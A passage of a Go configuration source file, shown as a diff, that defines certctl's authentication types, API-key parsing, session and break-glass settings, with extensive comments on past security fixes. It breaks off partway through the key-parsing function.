@@ -0,0 +1,601 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"log/slog"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 5 (2026-05-14): extracted from
|
||||||
|
// config.go. The largest split so far and the first to move
|
||||||
|
// EXPORTED helpers — every external importer of
|
||||||
|
// config.AuthType / config.AuthTypeNone / config.AuthTypeAPIKey /
|
||||||
|
// config.AuthTypeOIDC / config.ValidAuthTypes / config.ParseNamedAPIKeys
|
||||||
|
// resolves the same after the move because the package name stays
|
||||||
|
// `config`. Public-surface invariant is verified by:
|
||||||
|
//
|
||||||
|
// - broader-importer build: cmd/server/main.go + auth_backfill.go
|
||||||
|
// reference config.AuthType + config.AuthTypeNone +
|
||||||
|
// config.AuthTypeAPIKey + config.AuthTypeOIDC +
|
||||||
|
// config.ValidAuthTypes — all compile clean after the move.
|
||||||
|
// - internal/auth/middleware.go and internal/api/handler/health.go
|
||||||
|
// reference config.AuthType in doc comments + type fields.
|
||||||
|
// - go test ./internal/config/... — package tests (including
|
||||||
|
// config_test.go which pins "jwt" out of ValidAuthTypes per G-1)
|
||||||
|
// stay green.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// Five types (one ergonomic enum + four config structs):
|
||||||
|
//
|
||||||
|
// NamedAPIKey — one named API-key entry with optional
|
||||||
|
// admin flag. Used by the authentication
|
||||||
|
// middleware for actor attribution in the
|
||||||
|
// audit trail (M-002 / M-003).
|
||||||
|
// AuthType (+ const) — the discriminator for the API auth
|
||||||
|
// middleware shape, with three named
|
||||||
|
// constants (AuthTypeAPIKey / AuthTypeNone /
|
||||||
|
// AuthTypeOIDC). The G-1 invariant pins
|
||||||
|
// "jwt" OUT of this set forever.
|
||||||
|
// AuthConfig — the top-level authentication configuration
|
||||||
|
// (Type, Secret, NamedKeys, AgentBootstrapToken,
|
||||||
|
// DemoModeAck + TS, OIDC pre-login binding
|
||||||
|
// knobs, embedded Session + Breakglass +
|
||||||
|
// the bootstrap-admin-group surface).
|
||||||
|
// SessionConfig — Auth Bundle 2 Phase 4 session-service
|
||||||
|
// tunables (idle / absolute / signing-key
|
||||||
|
// retention / GC / SameSite / IP+UA bind).
|
||||||
|
// BreakglassConfig — Auth Bundle 2 Phase 7.5 local-password
|
||||||
|
// break-glass tunables (enabled gate +
|
||||||
|
// lockout-threshold / duration / reset).
|
||||||
|
//
|
||||||
|
// Two exported helpers (FIRST sprint to move public-API helpers):
|
||||||
|
//
|
||||||
|
// ValidAuthTypes() — single source of truth for the allowed
|
||||||
|
// CERTCTL_AUTH_TYPE set. Called from:
|
||||||
|
// - cmd/server/main.go (runtime guard)
|
||||||
|
// - the validator below in config.go
|
||||||
|
// - the helm chart template
|
||||||
|
// - the property test in config_test.go
|
||||||
|
// that pins "jwt" out of the slice.
|
||||||
|
// ParseNamedAPIKeys() — parses the CERTCTL_API_KEYS_NAMED env-var
|
||||||
|
// into a []NamedAPIKey with rotation-aware
|
||||||
|
// duplicate-name handling (L-004 contract).
|
||||||
|
//
|
||||||
|
// One unexported helper:
|
||||||
|
//
|
||||||
|
// isValidKeyName() — alphanumeric + hyphen + underscore
|
||||||
|
// validator for the Name field of
|
||||||
|
// NamedAPIKey. Only called from
|
||||||
|
// ParseNamedAPIKeys (intra-file edge
|
||||||
|
// after the move).
|
||||||
|
//
|
||||||
|
// What stayed in config.go
|
||||||
|
// ========================
|
||||||
|
// - ErrAgentBootstrapTokenRequired sentinel (top of config.go, in
|
||||||
|
// the Phase-2 sentinel block) — tied to Validate()'s behavior,
|
||||||
|
// not to AuthConfig's struct shape. Same precedent as Sprint 2's
|
||||||
|
// ErrACMEInsecureWithoutAck (which also stayed in config.go).
|
||||||
|
// ErrDemoModeAckExpired likewise (same reasoning).
|
||||||
|
// - The Validate() body that branches on AuthType / DemoModeAck /
|
||||||
|
// AgentBootstrapTokenDenyEmpty — cross-cutting validation that
|
||||||
|
// stays where the other Validate() branches live.
|
||||||
|
// - The Load() body that calls ParseNamedAPIKeys() and synthesizes
|
||||||
|
// the AuthConfig + SessionConfig + BreakglassConfig zero-values.
|
||||||
|
// - The shared getEnv / getEnvBool / getEnvInt / getEnvDuration
|
||||||
|
// helpers + splitComma + trimSpace (used by ParseNamedAPIKeys),
|
||||||
|
// shared across every config family.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: go doc internal/config AuthConfig /
|
||||||
|
// SessionConfig / BreakglassConfig / NamedAPIKey / AuthType /
|
||||||
|
// AuthTypeAPIKey / AuthTypeNone / AuthTypeOIDC / ValidAuthTypes /
|
||||||
|
// ParseNamedAPIKeys all produce identical output before and after
|
||||||
|
// this split.
|
||||||
|
|
||||||
|
// NamedAPIKey represents a single named API key with an optional admin flag.
|
||||||
|
// Named keys allow real actor attribution in the audit trail (M-002) and provide
|
||||||
|
// the admin-gate basis for privileged endpoints like bulk revocation (M-003).
|
||||||
|
type NamedAPIKey struct {
|
||||||
|
// Name is the identifier for the key (alphanumeric, hyphens, underscores).
|
||||||
|
// This value is recorded as the actor on every audit event the key authenticates.
|
||||||
|
Name string
|
||||||
|
// Key is the raw API-key secret the client presents as `Authorization: Bearer <key>`.
|
||||||
|
Key string
|
||||||
|
// Admin controls whether the key has admin privileges (bulk revocation, etc.).
|
||||||
|
Admin bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// AuthType is the discriminator for the API auth middleware shape. The
|
||||||
|
// string alias preserves env-var roundtrip (the value flows through getEnv
|
||||||
|
// as a plain string) while giving us a typed surface for switches and
|
||||||
|
// validation. Use the named constants below rather than string literals
|
||||||
|
// so future enum additions/removals are caught at compile time.
|
||||||
|
//
|
||||||
|
// G-1 (P1): the pre-G-1 validAuthTypes map literal accepted "jwt" with no
|
||||||
|
// JWT middleware behind it (silent auth downgrade — the configured type
|
||||||
|
// was logged as "jwt" but every request routed through the api-key bearer
|
||||||
|
// middleware regardless). Operators who set CERTCTL_AUTH_TYPE=jwt thought
|
||||||
|
// they had JWT auth; they didn't. The typed alias + ValidAuthTypes()
|
||||||
|
// helper make the allowed set the single source of truth across config
|
||||||
|
// validation, the runtime defense-in-depth switch in main.go, and the
|
||||||
|
// helm-chart template guard (`certctl.validateAuthType`).
|
||||||
|
type AuthType string
|
||||||
|
|
||||||
|
const (
|
||||||
|
// AuthTypeAPIKey routes requests through the api-key bearer middleware.
|
||||||
|
// CERTCTL_AUTH_SECRET (or CERTCTL_API_KEYS_NAMED) is required.
|
||||||
|
AuthTypeAPIKey AuthType = "api-key"
|
||||||
|
|
||||||
|
// AuthTypeNone disables authentication entirely. Development only —
|
||||||
|
// the server logs a loud Warn at startup. Operators who need
|
||||||
|
// JWT/OIDC/mTLS run an authenticating gateway (oauth2-proxy / Envoy
|
||||||
|
// ext_authz / Traefik ForwardAuth / Pomerium) in front of certctl
|
||||||
|
// and set this value on the upstream certctl process. See
|
||||||
|
// docs/architecture.md "Authenticating-gateway pattern".
|
||||||
|
AuthTypeNone AuthType = "none"
|
||||||
|
|
||||||
|
// AuthTypeOIDC (Auth Bundle 2 Phase 0) reserves the literal that the
|
||||||
|
// OIDC handler chain (Bundle 2 Phase 5+6) consumes. Pre-Bundle-2
|
||||||
|
// behavior: the literal is allowed by the validator but the handler
|
||||||
|
// chain is not yet wired, so the runtime guard in cmd/server/main.go
|
||||||
|
// surfaces a clear "oidc auth-type configured but Bundle 2 handlers
|
||||||
|
// not registered" error rather than silently falling back to api-key
|
||||||
|
// (the failure mode that drove G-1's jwt-literal removal). Once
|
||||||
|
// Bundle 2's session middleware + OIDC service ship, the runtime
|
||||||
|
// guard relaxes and CERTCTL_AUTH_TYPE=oidc routes through them.
|
||||||
|
//
|
||||||
|
// Note: this is the AUTH-TYPE literal value, NOT the JWT alg literal.
|
||||||
|
// ID tokens are JWTs internally but the auth-type config string is
|
||||||
|
// "oidc". The G-1 closure test (TestValidAuthTypesDoesNotContainJWT)
|
||||||
|
// stays passing because "jwt" is never added back to the slice.
|
||||||
|
AuthTypeOIDC AuthType = "oidc"
|
||||||
|
)
|
||||||
|
|
||||||
|
// ValidAuthTypes returns the allowed CERTCTL_AUTH_TYPE values. The set is
|
||||||
|
// intentionally narrow — JWT was accepted pre-G-1 with no middleware
|
||||||
|
// implementation behind it. Single source of truth referenced by the
|
||||||
|
// validator below, the runtime guard in cmd/server/main.go, the helm
|
||||||
|
// chart template (`certctl.validateAuthType`), and the property test in
|
||||||
|
// config_test.go that pins "jwt" out of the slice forever.
|
||||||
|
//
|
||||||
|
// Bundle 2 Phase 0 adds AuthTypeOIDC to the slice. The G-1 invariant
|
||||||
|
// remains: "jwt" stays out of the allowed set forever; OIDC ID tokens
|
||||||
|
// are JWTs internally but the auth-type literal is "oidc", so the
|
||||||
|
// silent-downgrade attack surface that "jwt" represented does not
|
||||||
|
// regress.
|
||||||
|
func ValidAuthTypes() []AuthType {
|
||||||
|
return []AuthType{AuthTypeAPIKey, AuthTypeNone, AuthTypeOIDC}
|
||||||
|
}
|
||||||
|
|
||||||
|
// AuthConfig contains authentication configuration.
|
||||||
|
type AuthConfig struct {
|
||||||
|
// Type sets the authentication mechanism for the REST API.
|
||||||
|
// Valid values: "api-key" (default, production) and "none" (development
|
||||||
|
// only — disables authentication on the API and logs a loud Warn at
|
||||||
|
// startup). For JWT/OIDC, run an authenticating gateway (oauth2-proxy /
|
||||||
|
// Envoy / Traefik ForwardAuth / Pomerium) in front of certctl and set
|
||||||
|
// CERTCTL_AUTH_TYPE=none on the upstream — see docs/architecture.md
|
||||||
|
// "Authenticating-gateway pattern" and docs/upgrade-to-v2-jwt-removal.md.
|
||||||
|
// Setting: CERTCTL_AUTH_TYPE environment variable. Default: "api-key".
|
||||||
|
// Use the AuthType constants (AuthTypeAPIKey / AuthTypeNone) for typed
|
||||||
|
// comparisons; the field stays `string` to preserve env-var roundtrip
|
||||||
|
// shape used by getEnv() and downstream Helm/compose interpolation.
|
||||||
|
Type string
|
||||||
|
|
||||||
|
// Secret is the legacy authentication secret (comma-separated API keys).
|
||||||
|
// DEPRECATED in favor of NamedKeys — retained for backward compatibility.
|
||||||
|
// When NamedKeys is empty and Secret is set, each comma-separated key is
|
||||||
|
// registered as a synthesized named key (legacy-key-0, legacy-key-1, ...)
|
||||||
|
// with actor attribution defaulting to "legacy-key-<index>".
|
||||||
|
// Setting: CERTCTL_AUTH_SECRET environment variable.
|
||||||
|
Secret string
|
||||||
|
|
||||||
|
// NamedKeys is the parsed set of named API keys. Populated from
|
||||||
|
// CERTCTL_API_KEYS_NAMED via ParseNamedAPIKeys during Load(). When
|
||||||
|
// non-empty, this takes precedence over the legacy Secret field.
|
||||||
|
// Setting: CERTCTL_API_KEYS_NAMED="name1:key1,name2:key2:admin"
|
||||||
|
NamedKeys []NamedAPIKey
|
||||||
|
|
||||||
|
// AgentBootstrapToken is the pre-shared secret enforced on the agent
|
||||||
|
// registration endpoint (POST /api/v1/agents). Bundle-5 / Audit H-007 /
|
||||||
|
// CWE-306 + CWE-288: pre-Bundle-5, any host with network reach to the
|
||||||
|
// server could self-register an agent and start polling for work — no
|
||||||
|
// shared secret required. Post-Bundle-5: when this field is non-empty,
|
||||||
|
// the registration handler requires `Authorization: Bearer <token>`
|
||||||
|
// (constant-time comparison via crypto/subtle.ConstantTimeCompare); 401
|
||||||
|
// on missing/wrong/malformed.
|
||||||
|
//
|
||||||
|
// Backwards compatibility: when empty (the v2.0.x default), the server
|
||||||
|
// logs a startup WARN announcing the v2.2.0 deprecation — the field
|
||||||
|
// will become required in v2.2.0 and unset will fail-loud — and accepts
|
||||||
|
// registrations as today. Existing demo deploys that don't set it keep
|
||||||
|
// working through v2.1.x.
|
||||||
|
//
|
||||||
|
// Generation guidance: `openssl rand -hex 32` (256-bit entropy).
|
||||||
|
// Setting: CERTCTL_AGENT_BOOTSTRAP_TOKEN environment variable.
|
||||||
|
AgentBootstrapToken string
|
||||||
|
|
||||||
|
// AgentBootstrapTokenDenyEmpty is the staged feature flag for SEC-H1
|
||||||
|
// (Phase 2, 2026-05-13). When true AND AgentBootstrapToken is empty,
|
||||||
|
// Validate() returns ErrAgentBootstrapTokenRequired and the server
|
||||||
|
// refuses to start. Default: false (warn-mode pass-through preserved
|
||||||
|
// for backward compatibility with operators on the v2.1.x line).
|
||||||
|
// WORKSPACE-ROADMAP.md schedules the default flip to true for the
|
||||||
|
// v2.2.0 cut — operators get one upgrade-window to set a real token.
|
||||||
|
// Setting: CERTCTL_AGENT_BOOTSTRAP_TOKEN_DENY_EMPTY environment variable.
|
||||||
|
AgentBootstrapTokenDenyEmpty bool
|
||||||
|
|
||||||
|
// Session holds the Auth Bundle 2 Phase 4 session-service tunables.
|
||||||
|
// Defaults are documented on the SessionConfig fields. The session
|
||||||
|
// service is wired into cmd/server/main.go alongside the OIDC
|
||||||
|
// service in Phase 5; pre-Phase-5 deployments that run with the
|
||||||
|
// legacy `api-key` auth type ignore this struct entirely.
|
||||||
|
Session SessionConfig
|
||||||
|
|
||||||
|
// TrustedProxies is the comma-separated list of CIDR ranges from
|
||||||
|
// which X-Forwarded-For is honored. Empty (default) disables XFF
|
||||||
|
// trust entirely — every request's source IP is read from
|
||||||
|
// r.RemoteAddr regardless of XFF headers. Audit 2026-05-10 LOW-5
|
||||||
|
// closure: pre-fix the audit subsystem trusted any caller-supplied
|
||||||
|
// XFF for IP attribution, letting an attacker inject arbitrary IPs
|
||||||
|
// into audit rows + session IP-binding. Post-fix XFF is read only
|
||||||
|
// when the direct connection's RemoteAddr is in this allowlist.
|
||||||
|
// Setting: CERTCTL_TRUSTED_PROXIES (e.g. "10.0.0.0/8,192.168.0.0/16").
|
||||||
|
TrustedProxies []string
|
||||||
|
|
||||||
|
// DemoModeAck must be true to allow CERTCTL_AUTH_TYPE=none with a
|
||||||
|
// non-loopback listen address. Default false. Audit 2026-05-10
|
||||||
|
// HIGH-12 closure: pre-fix, an operator who flipped Type=none
|
||||||
|
// "temporarily" or via misconfig exposed admin functions to anyone
|
||||||
|
// reachable on port 8443 — the demo-mode synthetic actor
|
||||||
|
// `actor-demo-anon` is wired with `AdminKey=true`, so every
|
||||||
|
// request was served as a full admin. The control plane is
|
||||||
|
// HTTPS-only but a misconfigured ingress / public bind meant
|
||||||
|
// unauthenticated full admin. Post-fix: Validate() refuses to
|
||||||
|
// start when Type=none AND the listener binds to a non-loopback
|
||||||
|
// address (0.0.0.0, ::, or a routable IP) UNLESS the operator
|
||||||
|
// also sets DemoModeAck=true to acknowledge the bypass. Production
|
||||||
|
// deployments MUST set Type to a real authn type (api-key | oidc).
|
||||||
|
// Setting: CERTCTL_DEMO_MODE_ACK environment variable.
|
||||||
|
DemoModeAck bool
|
||||||
|
|
||||||
|
// DemoModeAckTS is the unix-epoch timestamp at which DemoModeAck was
|
||||||
|
// last acknowledged. Phase 2 SEC-H3 closure (2026-05-13): the sticky
|
||||||
|
// DemoModeAck bit now expires after 24h. When DemoModeAck=true,
|
||||||
|
// Validate() requires DemoModeAckTS to be set AND parse as a unix
|
||||||
|
// epoch within the last demoModeAckMaxAge (24h); otherwise
|
||||||
|
// ErrDemoModeAckExpired fires and the server refuses to start.
|
||||||
|
//
|
||||||
|
// This catches the canonical "demo deployment accidentally
|
||||||
|
// promoted to production and forgotten about" failure mode: the
|
||||||
|
// container restart that re-loads config now refuses unless the
|
||||||
|
// operator re-supplies a fresh timestamp.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_DEMO_MODE_ACK_TS (unix epoch, e.g. `$(date +%s)`).
|
||||||
|
// The demo compose helper sets this automatically at compose-up.
|
||||||
|
DemoModeAckTS string
|
||||||
|
|
||||||
|
// DemoModeResidualStrict refuses startup when Auth.Type != none
|
||||||
|
// and `actor-demo-anon` has residual role grants in actor_roles.
|
||||||
|
// Default false (emit WARN log + audit row instead). Audit
|
||||||
|
// 2026-05-11 A-8 closure — closes the deferred Phase 2 leg of
|
||||||
|
// HIGH-12 (cowork/auth-bundles-fixes-2026-05-10/11-high-12-...).
|
||||||
|
//
|
||||||
|
// Note: migration 000029 unconditionally seeds the
|
||||||
|
// `ar-demo-anon-admin` grant of `r-admin` to `actor-demo-anon`
|
||||||
|
// for every install, so production deploys will see this WARN
|
||||||
|
// out of the box. The intended workflow at production cutover is:
|
||||||
|
// 1. POST /api/v1/auth/demo-residual/cleanup (or run the
|
||||||
|
// DELETE FROM actor_roles WHERE actor_id='actor-demo-anon'
|
||||||
|
// SQL emitted by the WARN).
|
||||||
|
// 2. Optionally set this flag for subsequent boots to refuse
|
||||||
|
// startup if the rows somehow get re-seeded.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_DEMO_MODE_RESIDUAL_STRICT environment variable.
|
||||||
|
DemoModeResidualStrict bool
|
||||||
|
|
||||||
|
// OIDCBCLMaxAgeSeconds is the iat-freshness skew window for OIDC
|
||||||
|
// back-channel-logout tokens. logout_tokens with iat outside the
|
||||||
|
// window are rejected with audit outcome=iat_stale (in the past)
|
||||||
|
// or iat_future (in the future). Audit 2026-05-10 HIGH-3 closure.
|
||||||
|
// Default 60s matches the ID-token skew tolerance in
|
||||||
|
// internal/auth/oidc/service.go. Range: 10-300; values outside
|
||||||
|
// this window indicate IdP clock misconfiguration that warrants
|
||||||
|
// operator attention.
|
||||||
|
// Setting: CERTCTL_OIDC_BCL_MAX_AGE_SECONDS environment variable.
|
||||||
|
OIDCBCLMaxAgeSeconds int
|
||||||
|
|
||||||
|
// OIDCPreLoginRequireUA enables the RFC 9700 §4.7.1 user-agent
|
||||||
|
// binding check on /auth/oidc/callback. Audit 2026-05-10 MED-16.
|
||||||
|
// Default true. Operators on enterprise proxies that rewrite the
|
||||||
|
// UA header set this false; the binding value is still persisted
|
||||||
|
// + audited even when enforcement is off so retroactive forensics
|
||||||
|
// remain possible.
|
||||||
|
// Setting: CERTCTL_OIDC_PRELOGIN_REQUIRE_UA environment variable.
|
||||||
|
OIDCPreLoginRequireUA bool
|
||||||
|
|
||||||
|
// OIDCPreLoginRequireIP enables the RFC 9700 §4.7.1 source-IP
|
||||||
|
// binding check on /auth/oidc/callback. Audit 2026-05-10 MED-16.
|
||||||
|
// Default true. Operators on dual-stack v4/v6 or mobile
|
||||||
|
// carrier-grade NAT where source IP routinely flips set this
|
||||||
|
// false; persistence + audit behave the same as UA above.
|
||||||
|
// Setting: CERTCTL_OIDC_PRELOGIN_REQUIRE_IP environment variable.
|
||||||
|
OIDCPreLoginRequireIP bool
|
||||||
|
|
||||||
|
// Breakglass holds the Auth Bundle 2 Phase 7.5 break-glass admin
|
||||||
|
// tunables. Default-OFF; the entire surface is invisible (404
|
||||||
|
// instead of 403) when CERTCTL_BREAKGLASS_ENABLED is not true.
|
||||||
|
// Threat model: enabling break-glass is a deliberate bypass of
|
||||||
|
// the SSO security boundary; operators turn it on during SSO
|
||||||
|
// incidents and turn it off after recovery.
|
||||||
|
Breakglass BreakglassConfig
|
||||||
|
|
||||||
|
// BootstrapAdminGroups is the comma-separated list of IdP group
|
||||||
|
// names that grant the FIRST OIDC-authenticated user the r-admin
|
||||||
|
// role. Auth Bundle 2 Phase 7 / Decision 3. Empty (default)
|
||||||
|
// disables the OIDC-first-admin bootstrap path; the env-var-token
|
||||||
|
// path (BootstrapToken below) remains the fallback for fresh
|
||||||
|
// deployments without OIDC. When both are configured, OIDC wins
|
||||||
|
// on group match.
|
||||||
|
// Setting: CERTCTL_BOOTSTRAP_ADMIN_GROUPS environment variable.
|
||||||
|
BootstrapAdminGroups []string
|
||||||
|
|
||||||
|
// BootstrapOIDCProviderID restricts the OIDC-first-admin bootstrap
|
||||||
|
// path to a specific provider id (matches the seeded provider
|
||||||
|
// name in oidc_providers.id). Empty (default) accepts a match
|
||||||
|
// from any configured provider. Useful when an operator
|
||||||
|
// configures multiple IdPs and wants only the corporate IdP to
|
||||||
|
// be eligible for bootstrap.
|
||||||
|
// Setting: CERTCTL_BOOTSTRAP_OIDC_PROVIDER_ID environment variable.
|
||||||
|
BootstrapOIDCProviderID string
|
||||||
|
|
||||||
|
// BootstrapToken is the one-shot pre-shared secret that gates the
|
||||||
|
// Bundle 1 Phase 6 bootstrap endpoint (POST /v1/auth/bootstrap). When
|
||||||
|
// set at server startup AND no admin-roled actors exist, the
|
||||||
|
// bootstrap endpoint becomes callable: an operator POSTs the token
|
||||||
|
// and a desired admin-key name; the server mints a fresh API key,
|
||||||
|
// grants it the r-admin role, and returns the key value once. The
|
||||||
|
// token is then invalidated in memory; subsequent calls return 410
|
||||||
|
// Gone. The endpoint also returns 410 Gone when admin actors already
|
||||||
|
// exist (no need for the bootstrap path).
|
||||||
|
//
|
||||||
|
// Server NEVER logs this token. The minted admin key is returned in
|
||||||
|
// the HTTP response body only; not logged. Operators who lose track
|
||||||
|
// of the minted key can rotate it via the regular RBAC API after
|
||||||
|
// bootstrap.
|
||||||
|
//
|
||||||
|
// Generation guidance: `openssl rand -hex 32` (256-bit entropy).
|
||||||
|
// Setting: CERTCTL_BOOTSTRAP_TOKEN environment variable.
|
||||||
|
BootstrapToken string
|
||||||
|
}
|
||||||
|
|
||||||
|
// SessionConfig contains the Auth Bundle 2 Phase 4 session-service
|
||||||
|
// tunables. Every field is operator-overridable via the documented
|
||||||
|
// CERTCTL_SESSION_* env var; defaults are the conservative values from
|
||||||
|
// the Phase 4 spec.
|
||||||
|
//
|
||||||
|
// Bundle 2 Phase 4 / OWASP ASVS V3 (Session Management). The defaults
|
||||||
|
// (1h idle / 8h absolute / 24h key retention / 1h GC / Lax cookies /
|
||||||
|
// no IP-or-UA bind) are the conservative starting point that matches
|
||||||
|
// the prompt; tightening to Strict + IP/UA bind suits high-security
|
||||||
|
// environments at the cost of breaking inbound deep-links from external
|
||||||
|
// apps and login-from-mobile-on-cellular flows.
|
||||||
|
type SessionConfig struct {
|
||||||
|
// IdleTimeout: maximum time between authenticated requests on a
|
||||||
|
// session before re-auth is required. Default 1h. Wire:
|
||||||
|
// CERTCTL_SESSION_IDLE_TIMEOUT.
|
||||||
|
IdleTimeout time.Duration
|
||||||
|
|
||||||
|
// AbsoluteTimeout: maximum lifetime of a session regardless of
|
||||||
|
// activity. Default 8h. Wire: CERTCTL_SESSION_ABSOLUTE_TIMEOUT.
|
||||||
|
AbsoluteTimeout time.Duration
|
||||||
|
|
||||||
|
// SigningKeyRetention: time a retired signing key stays valid for
|
||||||
|
// verification before being purged from the keys table. Default
|
||||||
|
// 24h. Wire: CERTCTL_SESSION_SIGNING_KEY_RETENTION.
|
||||||
|
SigningKeyRetention time.Duration
|
||||||
|
|
||||||
|
// GCInterval: scheduler tick interval for the session-GC sweep.
|
||||||
|
// Default 1h. Wire: CERTCTL_SESSION_GC_INTERVAL.
|
||||||
|
GCInterval time.Duration
|
||||||
|
|
||||||
|
// SameSite: SameSite cookie attribute. Valid values: "Lax"
|
||||||
|
// (default) or "Strict". Strict is recommended for high-security
|
||||||
|
// environments at the cost of breaking inbound deep-links from
|
||||||
|
// external apps. Wire: CERTCTL_SESSION_SAMESITE.
|
||||||
|
SameSite string
|
||||||
|
|
||||||
|
// BindIP: when true, the session middleware compares the request's
|
||||||
|
// client IP to the session row's recorded IP on every Validate.
|
||||||
|
// Mismatch -> 401, audit row, session NOT auto-revoked (user may
|
||||||
|
// have legitimate IP change). Default false. Wire:
|
||||||
|
// CERTCTL_SESSION_BIND_IP.
|
||||||
|
BindIP bool
|
||||||
|
|
||||||
|
// BindUserAgent: when true, the session middleware compares the
|
||||||
|
// request's User-Agent to the session row's recorded UA on every
|
||||||
|
// Validate. Default false; useful only in tightly-controlled
|
||||||
|
// environments. Wire: CERTCTL_SESSION_BIND_USER_AGENT.
|
||||||
|
BindUserAgent bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// BreakglassConfig contains the Auth Bundle 2 Phase 7.5 break-glass
|
||||||
|
// admin tunables. Decision 4: operator-toggleable local-password
|
||||||
|
// admin for the SSO-broken case. Default-OFF; the entire surface is
|
||||||
|
// invisible (404 NOT 403) when Enabled=false.
|
||||||
|
//
|
||||||
|
// Threat model (load-bearing): enabling break-glass is a deliberate
|
||||||
|
// bypass of the SSO security boundary. An attacker who phishes the
|
||||||
|
// password OR finds it in a compromised password manager bypasses
|
||||||
|
// MFA, OIDC, and every group-claim gate. Recommendation: keep
|
||||||
|
// CERTCTL_BREAKGLASS_ENABLED=false in steady-state. Enable only
|
||||||
|
// during SSO-broken incidents. Disable after recovery. WebAuthn
|
||||||
|
// pairing (v3 per Decision 12) is the load-bearing second factor.
|
||||||
|
type BreakglassConfig struct {
|
||||||
|
// Enabled gates the entire service surface. Default false.
|
||||||
|
// Wire: CERTCTL_BREAKGLASS_ENABLED.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// LockoutThreshold is the failure count that trips the lockout.
|
||||||
|
// Default 5. Wire: CERTCTL_BREAKGLASS_LOCKOUT_THRESHOLD.
|
||||||
|
LockoutThreshold int
|
||||||
|
|
||||||
|
// LockoutDuration is how long the account stays locked after the
|
||||||
|
// threshold trips. Default 15m.
|
||||||
|
// Wire: CERTCTL_BREAKGLASS_LOCKOUT_DURATION.
|
||||||
|
LockoutDuration time.Duration
|
||||||
|
|
||||||
|
// LockoutResetInterval is the idle time after last_failure_at
|
||||||
|
// before the failure counter resets to 0 on next attempt.
|
||||||
|
// Default 1h. Wire: CERTCTL_BREAKGLASS_LOCKOUT_RESET_INTERVAL.
|
||||||
|
LockoutResetInterval time.Duration
|
||||||
|
}
|
||||||
|
|
||||||
|
// ParseNamedAPIKeys parses the CERTCTL_API_KEYS_NAMED environment variable.
|
||||||
|
// Format: "name1:key1,name2:key2:admin,name3:key3"
|
||||||
|
// The ":admin" suffix is optional; if present, the key has admin privileges.
|
||||||
|
// Returns a typed []NamedAPIKey so main.go can pass it directly to the
|
||||||
|
// middleware layer without type assertion gymnastics.
|
||||||
|
//
|
||||||
|
// Audit L-004 (CWE-924) — graceful key rotation contract:
|
||||||
|
//
|
||||||
|
// Two entries MAY share the same Name during a rotation overlap window:
|
||||||
|
// CERTCTL_API_KEYS_NAMED="alice:OLDKEY:admin,alice:NEWKEY:admin"
|
||||||
|
// When duplicates appear, both keys validate at the auth middleware
|
||||||
|
// (NewAuthWithNamedKeys iterates every entry on every request, so the
|
||||||
|
// match is by hash regardless of name collisions). Both produce the
|
||||||
|
// same UserKey context value (the shared name), which keeps the audit
|
||||||
|
// trail and per-user rate-limit bucket (Bundle B M-025) consistent
|
||||||
|
// across the rollover.
|
||||||
|
//
|
||||||
|
// The duplicate-name path is restricted: every entry sharing a name
|
||||||
|
// MUST carry the same admin flag — mixing admin=true with admin=false
|
||||||
|
// under the same identity would let a non-admin caller present the
|
||||||
|
// admin-flagged key and bypass the gate (or vice-versa). The contract
|
||||||
|
// is "rotate ONE key at a time"; the privilege level stays constant
|
||||||
|
// within the overlap window.
|
||||||
|
//
|
||||||
|
// Exact (name,key) duplicates are still rejected — that's a typo,
|
||||||
|
// not a rotation. Rotation requires DIFFERENT keys under the same
|
||||||
|
// name.
|
||||||
|
//
|
||||||
|
// Once the rollover is complete, the operator removes the OLDKEY
|
||||||
|
// entry and restarts. Single-entry steady state resumes.
|
||||||
|
//
|
||||||
|
// See docs/security.md::API key rotation for the full operator runbook.
|
||||||
|
func ParseNamedAPIKeys(input string) ([]NamedAPIKey, error) {
|
||||||
|
if input == "" {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
parts := splitComma(input)
|
||||||
|
var keys []NamedAPIKey
|
||||||
|
// nameToAdmin pins the admin flag for any name we've seen before; it
|
||||||
|
// is consulted on subsequent duplicate-name entries to enforce the
|
||||||
|
// "matching admin" contract above.
|
||||||
|
nameToAdmin := make(map[string]bool)
|
||||||
|
// nameSeen records whether we've seen a name at all (used to
|
||||||
|
// distinguish first-occurrence from duplicate-occurrence; we need
|
||||||
|
// this separate from nameToAdmin because admin=false is a valid
|
||||||
|
// recorded state).
|
||||||
|
nameSeen := make(map[string]bool)
|
||||||
|
// pairSeen rejects exact (name,key) duplicates as typos.
|
||||||
|
pairSeen := make(map[string]bool)
|
||||||
|
|
||||||
|
for _, part := range parts {
|
||||||
|
part = trimSpace(part)
|
||||||
|
if part == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
// Split by colon: name:key or name:key:admin
|
||||||
|
fields := strings.Split(part, ":")
|
||||||
|
if len(fields) < 2 || len(fields) > 3 {
|
||||||
|
return nil, fmt.Errorf("invalid named key format: %s (expected name:key or name:key:admin)", part)
|
||||||
|
}
|
||||||
|
|
||||||
|
name := trimSpace(fields[0])
|
||||||
|
key := trimSpace(fields[1])
|
||||||
|
admin := false
|
||||||
|
|
||||||
|
if len(fields) == 3 {
|
||||||
|
adminStr := trimSpace(fields[2])
|
||||||
|
if adminStr == "admin" {
|
||||||
|
admin = true
|
||||||
|
} else {
|
||||||
|
return nil, fmt.Errorf("invalid admin flag: %s (expected 'admin')", adminStr)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Validate name format: alphanumeric, hyphens, underscores
|
||||||
|
if !isValidKeyName(name) {
|
||||||
|
return nil, fmt.Errorf("invalid key name: %s (must be alphanumeric, hyphens, underscores)", name)
|
||||||
|
}
|
||||||
|
|
||||||
|
if key == "" {
|
||||||
|
return nil, fmt.Errorf("empty key for name: %s", name)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Typo guard: same (name,key) pair twice is never legitimate —
